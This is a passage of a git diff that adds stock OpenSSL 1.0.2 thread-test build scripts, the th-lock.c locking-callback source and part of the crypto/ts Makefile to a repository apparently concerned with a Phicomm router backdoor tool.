+mwldnlm.exe %LFLAGS% -screenname mttest -commandfile mttest.def mttest.o "%PRELUDE%" %LIBS% -o mttest.nlm
+if errorlevel 1 goto end
+
+goto end
+
+:inc_error
+echo.
+echo Environment variable MWCIncludes is not set - see install.nw
+goto end
+
+:prelude_error
+echo.
+echo Environment variable PRELUDE is not set - see install.nw
+goto end
+
+:imports_error
+echo.
+echo Environment variable IMPORTS is not set - see install.nw
+goto end
+    
+    
+:end
+set BLD_DEBUG=
+set CFLAGS=
+set LFLAGS=
+set LIBS=
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/profile.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/profile.sh
new file mode 100644
index 0000000..6e3e342
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/profile.sh
@@ -0,0 +1,4 @@
+#!/bin/sh
+/bin/rm -f mttest
+cc -p -DSOLARIS -I../../include -g mttest.c -o mttest -L/usr/lib/libc -ldl -L../.. -lthread  -lssl -lcrypto -lnsl -lsocket
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/ptest.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/ptest.bat
new file mode 100755
index 0000000..4071b5f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/ptest.bat
@@ -0,0 +1,4 @@
+del mttest.exe
+
+purify cl /O2 -DWIN32 /MD -I..\..\out mttest.c /Femttest ..\..\out\ssl32.lib ..\..\out\crypt32.lib
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/pthread.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/pthread.sh
new file mode 100644
index 0000000..f1c4982
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/pthread.sh
@@ -0,0 +1,9 @@
+#!/bin/sh
+#
+# build using pthreads
+#
+# http://www.mit.edu:8001/people/proven/pthreads.html
+#
+/bin/rm -f mttest
+pgcc -DPTHREADS -I../../include -g mttest.c -o mttest -L../.. -lssl -lcrypto 
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/pthread2.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/pthread2.sh
new file mode 100755
index 0000000..41264c6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/pthread2.sh
@@ -0,0 +1,7 @@
+#!/bin/sh
+#
+# build using pthreads where it's already built into the system
+#
+/bin/rm -f mttest
+gcc -DPTHREADS -I../../include -g mttest.c -o mttest -L../.. -lssl -lcrypto -lpthread
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/pthreads-vms.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/pthreads-vms.com
new file mode 100644
index 0000000..1cf92bd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/pthreads-vms.com
@@ -0,0 +1,14 @@
+$! To compile mttest on VMS.
+$!
+$! WARNING: only tested with DEC C so far.
+$
+$ if (f$getsyi("cpu").lt.128)
+$ then
+$     arch := VAX
+$ else
+$     arch = f$edit( f$getsyi( "ARCH_NAME"), "UPCASE")
+$     if (arch .eqs. "") then arch = "UNK"
+$ endif
+$ define/user openssl [--.include.openssl]
+$ cc/def=PTHREADS mttest.c
+$ link mttest,[--.'arch'.exe.ssl]libssl/lib,[--.'arch'.exe.crypto]libcrypto/lib
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/purify.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/purify.sh
new file mode 100644
index 0000000..6d44fe2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/purify.sh
@@ -0,0 +1,4 @@
+#!/bin/sh
+/bin/rm -f mttest
+purify cc -DSOLARIS -I../../include -g mttest.c -o mttest -L../.. -lthread  -lssl -lcrypto -lnsl -lsocket
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/solaris.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/solaris.sh
new file mode 100644
index 0000000..bc93094
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/solaris.sh
@@ -0,0 +1,4 @@
+#!/bin/sh
+/bin/rm -f mttest
+cc -DSOLARIS -I../../include -g mttest.c -o mttest -L../.. -lthread  -lssl -lcrypto -lnsl -lsocket
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/th-lock.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/th-lock.c
new file mode 100644
index 0000000..1b57659
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/th-lock.c
@@ -0,0 +1,368 @@
+/* crypto/threads/th-lock.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <errno.h>
+#ifdef LINUX
+# include <typedefs.h>
+#endif
+#ifdef OPENSSL_SYS_WIN32
+# include <windows.h>
+#endif
+#ifdef SOLARIS
+# include <synch.h>
+# include <thread.h>
+#endif
+#ifdef IRIX
+# include <ulocks.h>
+# include <sys/prctl.h>
+#endif
+#ifdef PTHREADS
+# include <pthread.h>
+#endif
+#include <openssl/lhash.h>
+#include <openssl/crypto.h>
+#include <openssl/buffer.h>
+#include "../../e_os.h"
+#include <openssl/x509.h>
+#include <openssl/ssl.h>
+#include <openssl/err.h>
+
+void CRYPTO_thread_setup(void);
+void CRYPTO_thread_cleanup(void);
+
+static void irix_locking_callback(int mode, int type, char *file, int line);
+static void solaris_locking_callback(int mode, int type, char *file,
+                                     int line);
+static void win32_locking_callback(int mode, int type, char *file, int line);
+static void pthreads_locking_callback(int mode, int type, char *file,
+                                      int line);
+
+static unsigned long irix_thread_id(void);
+static unsigned long solaris_thread_id(void);
+static unsigned long pthreads_thread_id(void);
+
+/*-
+ * usage:
+ * CRYPTO_thread_setup();
+ * application code
+ * CRYPTO_thread_cleanup();
+ */
+
+#define THREAD_STACK_SIZE (16*1024)
+
+#ifdef OPENSSL_SYS_WIN32
+
+static HANDLE *lock_cs;
+
+void CRYPTO_thread_setup(void)
+{
+    int i;
+
+    lock_cs = OPENSSL_malloc(CRYPTO_num_locks() * sizeof(HANDLE));
+    for (i = 0; i < CRYPTO_num_locks(); i++) {
+        lock_cs[i] = CreateMutex(NULL, FALSE, NULL);
+    }
+
+    CRYPTO_set_locking_callback((void (*)(int, int, char *, int))
+                                win32_locking_callback);
+    /* id callback defined */
+    return (1);
+}
+
+static void CRYPTO_thread_cleanup(void)
+{
+    int i;
+
+    CRYPTO_set_locking_callback(NULL);
+    for (i = 0; i < CRYPTO_num_locks(); i++)
+        CloseHandle(lock_cs[i]);
+    OPENSSL_free(lock_cs);
+}
+
+void win32_locking_callback(int mode, int type, char *file, int line)
+{
+    if (mode & CRYPTO_LOCK) {
+        WaitForSingleObject(lock_cs[type], INFINITE);
+    } else {
+        ReleaseMutex(lock_cs[type]);
+    }
+}
+
+#endif                          /* OPENSSL_SYS_WIN32 */
+
+#ifdef SOLARIS
+
+# define USE_MUTEX
+
+# ifdef USE_MUTEX
+static mutex_t *lock_cs;
+# else
+static rwlock_t *lock_cs;
+# endif
+static long *lock_count;
+
+void CRYPTO_thread_setup(void)
+{
+    int i;
+
+# ifdef USE_MUTEX
+    lock_cs = OPENSSL_malloc(CRYPTO_num_locks() * sizeof(mutex_t));
+# else
+    lock_cs = OPENSSL_malloc(CRYPTO_num_locks() * sizeof(rwlock_t));
+# endif
+    lock_count = OPENSSL_malloc(CRYPTO_num_locks() * sizeof(long));
+    for (i = 0; i < CRYPTO_num_locks(); i++) {
+        lock_count[i] = 0;
+# ifdef USE_MUTEX
+        mutex_init(&(lock_cs[i]), USYNC_THREAD, NULL);
+# else
+        rwlock_init(&(lock_cs[i]), USYNC_THREAD, NULL);
+# endif
+    }
+
+    CRYPTO_set_id_callback((unsigned long (*)())solaris_thread_id);
+    CRYPTO_set_locking_callback((void (*)())solaris_locking_callback);
+}
+
+void CRYPTO_thread_cleanup(void)
+{
+    int i;
+
+    CRYPTO_set_locking_callback(NULL);
+    for (i = 0; i < CRYPTO_num_locks(); i++) {
+# ifdef USE_MUTEX
+        mutex_destroy(&(lock_cs[i]));
+# else
+        rwlock_destroy(&(lock_cs[i]));
+# endif
+    }
+    OPENSSL_free(lock_cs);
+    OPENSSL_free(lock_count);
+}
+
+void solaris_locking_callback(int mode, int type, char *file, int line)
+{
+# if 0
+    fprintf(stderr, "thread=%4d mode=%s lock=%s %s:%d\n",
+            CRYPTO_thread_id(),
+            (mode & CRYPTO_LOCK) ? "l" : "u",
+            (type & CRYPTO_READ) ? "r" : "w", file, line);
+# endif
+
+# if 0
+    if (CRYPTO_LOCK_SSL_CERT == type)
+        fprintf(stderr, "(t,m,f,l) %ld %d %s %d\n",
+                CRYPTO_thread_id(), mode, file, line);
+# endif
+    if (mode & CRYPTO_LOCK) {
+# ifdef USE_MUTEX
+        mutex_lock(&(lock_cs[type]));
+# else
+        if (mode & CRYPTO_READ)
+            rw_rdlock(&(lock_cs[type]));
+        else
+            rw_wrlock(&(lock_cs[type]));
+# endif
+        lock_count[type]++;
+    } else {
+# ifdef USE_MUTEX
+        mutex_unlock(&(lock_cs[type]));
+# else
+        rw_unlock(&(lock_cs[type]));
+# endif
+    }
+}
+
+unsigned long solaris_thread_id(void)
+{
+    unsigned long ret;
+
+    ret = (unsigned long)thr_self();
+    return (ret);
+}
+#endif                          /* SOLARIS */
+
+#ifdef IRIX
+/* I don't think this works..... */
+
+static usptr_t *arena;
+static usema_t **lock_cs;
+
+void CRYPTO_thread_setup(void)
+{
+    int i;
+    char filename[20];
+
+    strcpy(filename, "/tmp/mttest.XXXXXX");
+    mktemp(filename);
+
+    usconfig(CONF_STHREADIOOFF);
+    usconfig(CONF_STHREADMALLOCOFF);
+    usconfig(CONF_INITUSERS, 100);
+    usconfig(CONF_LOCKTYPE, US_DEBUGPLUS);
+    arena = usinit(filename);
+    unlink(filename);
+
+    lock_cs = OPENSSL_malloc(CRYPTO_num_locks() * sizeof(usema_t *));
+    for (i = 0; i < CRYPTO_num_locks(); i++) {
+        lock_cs[i] = usnewsema(arena, 1);
+    }
+
+    CRYPTO_set_id_callback((unsigned long (*)())irix_thread_id);
+    CRYPTO_set_locking_callback((void (*)())irix_locking_callback);
+}
+
+void CRYPTO_thread_cleanup(void)
+{
+    int i;
+
+    CRYPTO_set_locking_callback(NULL);
+    for (i = 0; i < CRYPTO_num_locks(); i++) {
+        char buf[10];
+
+        sprintf(buf, "%2d:", i);
+        usdumpsema(lock_cs[i], stdout, buf);
+        usfreesema(lock_cs[i], arena);
+    }
+    OPENSSL_free(lock_cs);
+}
+
+void irix_locking_callback(int mode, int type, char *file, int line)
+{
+    if (mode & CRYPTO_LOCK) {
+        uspsema(lock_cs[type]);
+    } else {
+        usvsema(lock_cs[type]);
+    }
+}
+
+unsigned long irix_thread_id(void)
+{
+    unsigned long ret;
+
+    ret = (unsigned long)getpid();
+    return (ret);
+}
+#endif                          /* IRIX */
+
+/* Linux and a few others */
+#ifdef PTHREADS
+
+static pthread_mutex_t *lock_cs;
+static long *lock_count;
+
+void CRYPTO_thread_setup(void)
+{
+    int i;
+
+    lock_cs = OPENSSL_malloc(CRYPTO_num_locks() * sizeof(pthread_mutex_t));
+    lock_count = OPENSSL_malloc(CRYPTO_num_locks() * sizeof(long));
+    for (i = 0; i < CRYPTO_num_locks(); i++) {
+        lock_count[i] = 0;
+        pthread_mutex_init(&(lock_cs[i]), NULL);
+    }
+
+    CRYPTO_set_id_callback((unsigned long (*)())pthreads_thread_id);
+    CRYPTO_set_locking_callback((void (*)())pthreads_locking_callback);
+}
+
+void thread_cleanup(void)
+{
+    int i;
+
+    CRYPTO_set_locking_callback(NULL);
+    for (i = 0; i < CRYPTO_num_locks(); i++) {
+        pthread_mutex_destroy(&(lock_cs[i]));
+    }
+    OPENSSL_free(lock_cs);
+    OPENSSL_free(lock_count);
+}
+
+void pthreads_locking_callback(int mode, int type, char *file, int line)
+{
+# if 0
+    fprintf(stderr, "thread=%4d mode=%s lock=%s %s:%d\n",
+            CRYPTO_thread_id(),
+            (mode & CRYPTO_LOCK) ? "l" : "u",
+            (type & CRYPTO_READ) ? "r" : "w", file, line);
+# endif
+# if 0
+    if (CRYPTO_LOCK_SSL_CERT == type)
+        fprintf(stderr, "(t,m,f,l) %ld %d %s %d\n",
+                CRYPTO_thread_id(), mode, file, line);
+# endif
+    if (mode & CRYPTO_LOCK) {
+        pthread_mutex_lock(&(lock_cs[type]));
+        lock_count[type]++;
+    } else {
+        pthread_mutex_unlock(&(lock_cs[type]));
+    }
+}
+
+unsigned long pthreads_thread_id(void)
+{
+    unsigned long ret;
+
+    ret = (unsigned long)pthread_self();
+    return (ret);
+}
+
+#endif                          /* PTHREADS */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/win32.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/win32.bat
new file mode 100755
index 0000000..ee6da80
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/threads/win32.bat
@@ -0,0 +1,4 @@
+del mttest.exe
+
+cl /O2 -DWIN32 /MD -I..\..\out mttest.c /Femttest ..\..\out\ssleay32.lib ..\..\out\libeay32.lib
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/Makefile
new file mode 100644
index 0000000..86f9e60
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/Makefile
@@ -0,0 +1,253 @@
+#
+# SSLeay/crypto/ts/Makefile
+#
+
+DIR=	ts
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I../../include
+CFLAG = -g
+INSTALL_PREFIX=
+OPENSSLDIR=     /usr/local/ssl
+INSTALLTOP=/usr/local/ssl
+MAKEDEPPROG=	makedepend
+MAKEDEPEND=	$(TOP)/util/domd $(TOP) -MD $(MAKEDEPPROG)
+MAKEFILE=	Makefile
+AR=		ar r
+
+PEX_LIBS=
+EX_LIBS=
+ 
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL= Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	ts_err.c ts_req_utils.c ts_req_print.c ts_rsp_utils.c ts_rsp_print.c \
+	ts_rsp_sign.c ts_rsp_verify.c ts_verify_ctx.c ts_lib.c ts_conf.c \
+	ts_asn1.c
+LIBOBJ= ts_err.o ts_req_utils.o ts_req_print.o ts_rsp_utils.o ts_rsp_print.o \
+	ts_rsp_sign.o ts_rsp_verify.o ts_verify_ctx.o ts_lib.o ts_conf.o \
+	ts_asn1.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= ts.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+test:
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff enc dec sign verify
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+ts_asn1.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+ts_asn1.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_asn1.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_asn1.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_asn1.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_asn1.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_asn1.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ts_asn1.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ts_asn1.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_asn1.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_asn1.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_asn1.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_asn1.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_asn1.o: ../../include/openssl/x509v3.h ts_asn1.c
+ts_conf.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_conf.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_conf.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_conf.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_conf.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_conf.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_conf.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ts_conf.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ts_conf.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+ts_conf.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+ts_conf.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_conf.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_conf.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_conf.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_conf.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_conf.c
+ts_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ts_err.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ts_err.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+ts_err.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+ts_err.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ts_err.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ts_err.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+ts_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ts_err.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+ts_err.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+ts_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ts_err.o: ../../include/openssl/ts.h ../../include/openssl/x509.h
+ts_err.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ts_err.o: ts_err.c
+ts_lib.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ts_lib.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+ts_lib.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_lib.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_lib.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_lib.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ts_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+ts_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_lib.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_lib.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_lib.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ts_lib.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ts_lib.o: ../cryptlib.h ts.h ts_lib.c
+ts_req_print.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_req_print.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+ts_req_print.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ts_req_print.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+ts_req_print.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+ts_req_print.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ts_req_print.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ts_req_print.o: ../../include/openssl/objects.h
+ts_req_print.o: ../../include/openssl/opensslconf.h
+ts_req_print.o: ../../include/openssl/opensslv.h
+ts_req_print.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_req_print.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_req_print.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_req_print.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_req_print.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_req_print.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_req_print.c
+ts_req_utils.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_req_utils.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_req_utils.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_req_utils.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_req_utils.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_req_utils.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_req_utils.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ts_req_utils.o: ../../include/openssl/opensslconf.h
+ts_req_utils.o: ../../include/openssl/opensslv.h
+ts_req_utils.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_req_utils.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_req_utils.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_req_utils.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_req_utils.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_req_utils.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_req_utils.c
+ts_rsp_print.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_rsp_print.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+ts_rsp_print.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+ts_rsp_print.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+ts_rsp_print.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+ts_rsp_print.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+ts_rsp_print.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+ts_rsp_print.o: ../../include/openssl/objects.h
+ts_rsp_print.o: ../../include/openssl/opensslconf.h
+ts_rsp_print.o: ../../include/openssl/opensslv.h
+ts_rsp_print.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_rsp_print.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_rsp_print.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_rsp_print.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ts_rsp_print.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+ts_rsp_print.o: ../cryptlib.h ts.h ts_rsp_print.c
+ts_rsp_sign.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_rsp_sign.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_rsp_sign.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_rsp_sign.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_rsp_sign.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_rsp_sign.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_rsp_sign.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ts_rsp_sign.o: ../../include/openssl/opensslconf.h
+ts_rsp_sign.o: ../../include/openssl/opensslv.h
+ts_rsp_sign.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_rsp_sign.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_rsp_sign.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_rsp_sign.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_rsp_sign.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_rsp_sign.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_rsp_sign.c
+ts_rsp_utils.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_rsp_utils.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_rsp_utils.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_rsp_utils.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_rsp_utils.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_rsp_utils.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_rsp_utils.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ts_rsp_utils.o: ../../include/openssl/opensslconf.h
+ts_rsp_utils.o: ../../include/openssl/opensslv.h
+ts_rsp_utils.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
